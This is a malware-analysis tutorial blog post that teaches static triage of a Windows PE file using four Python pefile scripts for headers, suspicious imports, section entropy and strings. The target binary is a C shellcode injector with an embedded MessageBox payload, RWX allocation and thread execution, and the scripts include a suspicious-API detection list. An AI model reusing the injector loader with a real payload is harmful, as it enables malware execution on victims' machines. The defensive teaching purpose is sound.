Malware analysis: part 10. Practical PE parsing. Simple python examples.

6 minute read

﷽

Hello, cybersecurity enthusiasts and white hackers!

malware

This post is based on an exercise for my students and readers.

The PE file format theory - DOS header, Optional Header, section table, data directories - was already covered in the Windows shellcoding series. We are not repeating that here. Instead we go straight to the practical side: parsing a real PE binary with Python and extracting the information that matters for triage.

target binary

First we need something to analyze. Let’s write a simple Windows dropper in C (hack.c) that uses several APIs commonly seen in malware, like VirtualAlloc, WriteProcessMemory, CreateThread, WinExec:

/*
 * hack.c
 * simple windows dropper for PE analysis demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
 */
#include <windows.h>
#include <stdio.h>

// meow-meow messagebox harmless "malware" payload
unsigned char my_payload[] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
  0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
  0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
  0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
  0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
  0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
  0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
  0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
  0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
  0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
  0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
  0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
  0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
  0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
  0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
  0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
  0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
  0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};

static void drop_file(void) {
  HANDLE hFile = CreateFileA(
    "C:\\Temp\\quack.bin",
    GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL, NULL
  );
  if (hFile == INVALID_HANDLE_VALUE) return;
  DWORD written;
  WriteFile(hFile, my_payload, sizeof(my_payload), &written, NULL);
  CloseHandle(hFile);
}

int main(void) {
  drop_file();

  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload),
                            MEM_COMMIT | MEM_RESERVE,
                            PAGE_EXECUTE_READWRITE);
  if (!mem) return 1;

  WriteProcessMemory(GetCurrentProcess(), mem,
                     my_payload, sizeof(my_payload), NULL);

  WinExec("cmd.exe /c echo meow", SW_HIDE);

  HANDLE hThread = CreateThread(NULL, 0,
                                (LPTHREAD_START_ROUTINE)mem,
                                NULL, 0, NULL);
  if (hThread) {
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
  }

  VirtualFree(mem, 0, MEM_RELEASE);
  return 0;
}

cross-compile on Linux with mingw-w64:

x86_64-w64-mingw32-gcc -O0 -o hack.exe hack.c

malware

We now have hack.exe - a 64-bit Windows PE. All four examples below analyze this same file.

.\hack.exe

malware

Install the library if you have not already:

pip install pefile

malware

practical example 1 - basic metadata

hack.py reads the File Header and Optional Header and prints the fields that matter most for first-look triage: architecture, compile timestamp, entry point, image base, section list.

#!/usr/bin/env python3
"""
hack.py - PE basic metadata
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import datetime
import pefile

MACHINES = {
  0x014c: "x86 (i386)",
  0x8664: "x64 (AMD64)",
  0x01c0: "ARM",
  0xaa64: "ARM64",
}

def parse_basic(path: str) -> None:
  pe = pefile.PE(path)

  machine  = pe.FILE_HEADER.Machine
  ts       = pe.FILE_HEADER.TimeDateStamp
  ep       = pe.OPTIONAL_HEADER.AddressOfEntryPoint
  base     = pe.OPTIONAL_HEADER.ImageBase
  n_sects  = pe.FILE_HEADER.NumberOfSections
  compiled = datetime.datetime.utcfromtimestamp(ts).strftime("%Y-%m-%d %H:%M:%S UTC")

  print(f"file       : {path}")
  print(f"machine    : {MACHINES.get(machine, f'unknown 0x{machine:04x}')}")
  print(f"compiled   : {compiled}")
  print(f"entry point: 0x{ep:08x}  (VA 0x{base + ep:08x})")
  print(f"image base : 0x{base:016x}")
  print(f"sections   : {n_sects}")
  print()

  print(f"  {'name':<10} {'virt addr':>12}  {'raw size':>10}  characteristics")
  print(f"  {'-'*10} {'-'*12}  {'-'*10}  {'-'*14}")
  for s in pe.sections:
    name = s.Name.decode(errors="replace").rstrip("\x00")
    print(f"  {name:<10} 0x{s.VirtualAddress:08x}    {s.SizeOfRawData:>10}  0x{s.Characteristics:08x}")

  pe.close()

if __name__ == "__main__":
  parse_basic(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

demo 1

Just run:

python3 hack.py hack.exe

malware

The compile timestamp is the first thing to check in triage. Malware authors sometimes set it to zero (0x00000000) or forge an old date to confuse analysts. A timestamp far in the future, or exactly 0, is itself an indicator.

practical example 2 - import table and suspicious API detection

hack2.py walks the import directory and flags any function that appears in a known-suspicious list. The list covers the most common Windows APIs used for process injection, remote execution, keylogging, registry persistence, and anti-debug.

#!/usr/bin/env python3
"""
hack2.py - import table + suspicious API detection
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import pefile

SUSPICIOUS = {
  # memory / injection
  "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "VirtualProtectEx",
  "WriteProcessMemory", "ReadProcessMemory",
  "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
  # thread injection
  "CreateRemoteThread", "CreateRemoteThreadEx",
  "NtCreateThreadEx", "RtlCreateUserThread",
  "QueueUserAPC",
  # process
  "OpenProcess", "OpenThread",
  "CreateProcessA", "CreateProcessW",
  # execution
  "WinExec", "ShellExecuteA", "ShellExecuteW",
  "CreateThread",
  # networking
  "URLDownloadToFileA", "URLDownloadToFileW",
  "InternetOpenA", "InternetOpenW",
  "InternetConnectA", "InternetConnectW",
  "HttpOpenRequestA", "HttpSendRequestA",
  "socket", "connect", "send", "recv",
  # registry persistence
  "RegOpenKeyExA", "RegOpenKeyExW",
  "RegSetValueExA", "RegSetValueExW",
  # hooks / keylogging
  "SetWindowsHookExA", "SetWindowsHookExW",
  "GetAsyncKeyState", "GetKeyState",
  # anti-debug
  "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
  "NtQueryInformationProcess",
}

def parse_imports(path: str) -> None:
  pe = pefile.PE(path)

  if not hasattr(pe, "DIRECTORY_ENTRY_IMPORT"):
    print("no import directory found")
    pe.close()
    return

  flags = []

  for entry in pe.DIRECTORY_ENTRY_IMPORT:
    dll = entry.dll.decode(errors="replace")
    print(f"[+] {dll}")
    for imp in entry.imports:
      if imp.name is None:
        name = f"#ord{imp.ordinal}"
      else:
        name = imp.name.decode(errors="replace")
      tag = " <-- SUSPICIOUS" if name in SUSPICIOUS else ""
      print(f"    {name}{tag}")
      if tag:
        flags.append((dll, name))

  print()
  if flags:
    print(f"{len(flags)} suspicious import(s):")
    for dll, fn in flags:
      print(f"    {dll}!{fn}")
  else:
    print("no suspicious imports detected")

  pe.close()

if __name__ == "__main__":
  parse_imports(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

demo 2

Run:

python3 hack2.py hack.exe

malware

VirtualAlloc, WriteProcessMemory, CreateThread, WinExec - all flagged. This is exactly the import profile of a basic shellcode injector. A clean utility would import none of those.

practical example 3 - per-section Shannon entropy

In part 6 we computed Shannon entropy for a whole file. Here we apply the same formula per section. A packed or encrypted section has entropy close to 8.0 (maximum). A normal .text section is typically between 5.0 and 6.5.

#!/usr/bin/env python3
"""
hack3.py - per-section Shannon entropy
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import math
import pefile

def entropy(data: bytes) -> float:
  if not data:
    return 0.0
  freq = [0] * 256
  for b in data:
    freq[b] += 1
  n = len(data)
  h = 0.0
  for f in freq:
    if f:
      p = f / n
      h -= p * math.log2(p)
  return h

HIGH   = 7.0
MEDIUM = 6.0

def parse_entropy(path: str) -> None:
  pe = pefile.PE(path)

  print(f"section entropy: {path}\n")
  print(f"  {'name':<10} {'entropy':>8}  {'raw size':>10}  verdict")
  print(f"  {'-'*10} {'-'*8}  {'-'*10}  {'-'*22}")

  for s in pe.sections:
    name = s.Name.decode(errors="replace").rstrip("\x00")
    data = s.get_data()
    h    = entropy(data)

    if h >= HIGH:
      verdict = "!! packed / encrypted"
    elif h >= MEDIUM:
      verdict = "?  possibly compressed"
    else:
      verdict = "   normal"

    print(f"  {name:<10} {h:>8.4f}  {len(data):>10}  {verdict}")

  pe.close()

if __name__ == "__main__":
  parse_entropy(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

Run:

python3 hack3.py hack.exe

malware

Our toy dropper is not packed, so entropy will be in the normal range. When you later run this against a UPX-packed binary you will see the .UPX0 / .UPX1 sections hit 7.9+ immediately - that is the detector working correctly.

practical example 4 - string extraction from raw section data

strings is a standard tool, but running it as a subprocess is a black box. hack4.py does the same thing in pure Python: scan each section’s raw bytes with a regular expression for runs of printable ASCII of at least 6 characters. Students see exactly what strings does and can extend it (Unicode support, minimum length flag, output filtering).

#!/usr/bin/env python3
"""
hack4.py - printable string extraction from PE sections
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import re
import pefile

MIN_LEN = 6
PATTERN = re.compile(rb'[ -~]{' + str(MIN_LEN).encode() + rb',}')

def parse_strings(path: str) -> None:
  pe = pefile.PE(path)

  total = 0
  for s in pe.sections:
    name    = s.Name.decode(errors="replace").rstrip("\x00")
    data    = s.get_data()
    matches = PATTERN.findall(data)

    if matches:
      print(f"{name} - {len(matches)} string(s):")
      for m in matches:
        print(f"    {m.decode(errors='replace')}")
      total += len(matches)
    else:
      print(f"{name} - no strings >= {MIN_LEN} chars")

  print(f"\ntotal: {total} string(s)")
  pe.close()

if __name__ == "__main__":
  parse_strings(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

Run:

python3 hack4.py hack.exe

malware

We should see the hardcoded strings from our dropper: C:\Temp\quack.bin, cmd.exe /c echo meow, string from payload: Meow-meow! and the imported DLL names and function name strings the linker embedded. Those are our IOCs.

summary

four python scripts, one compiled PE target, zero black-box tools:

script	what it does
`hack.py`	machine type, timestamp, entry point, sections
`hack2.py`	full import table, suspicious API flagging
`hack3.py`	per-section Shannon entropy (packing detector)
`hack4.py`	printable string extraction from raw bytes

Together they form a repeatable triage pipeline you can run against any unknown Windows binary before opening a disassembler. The natural next step is to pipe the extracted strings and suspicious imports into the VirusTotal API from part 4 to enrich the findings automatically.

In the next part we will cover dynamic analysis basics: tracing system calls on Linux with strace and ltrace to understand what a binary does at runtime without touching a disassembler at all.

I hope this post with practical examples is useful for malware researchers, reverse engineers and everyone interested in blue team skills.

Windows shellcoding part 3: PE file format Malware analysis part 6: Shannon entropy Malware analysis part 4: VirusTotal API pefile mingw-w64 source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine

Share on

Twitter Facebook LinkedIn

cocomelonc

Malware analysis: part 10. Practical PE parsing. Simple python examples.

target binary

practical example 1 - basic metadata

demo 1

practical example 2 - import table and suspicious API detection

demo 2

practical example 3 - per-section Shannon entropy

practical example 4 - string extraction from raw section data

summary

Share on

You may also enjoy

Malware development trick 60: Function stomping (remote process). Simple C example

Malware and cryptography 45 - Shamir Secret Sharing. Simple C example.

Anti-DDoS research part 3: SYN flood detection with handshake asymmetry. Simple C, Python examples.

Malware development trick 59: Function stomping (current process). Simple C example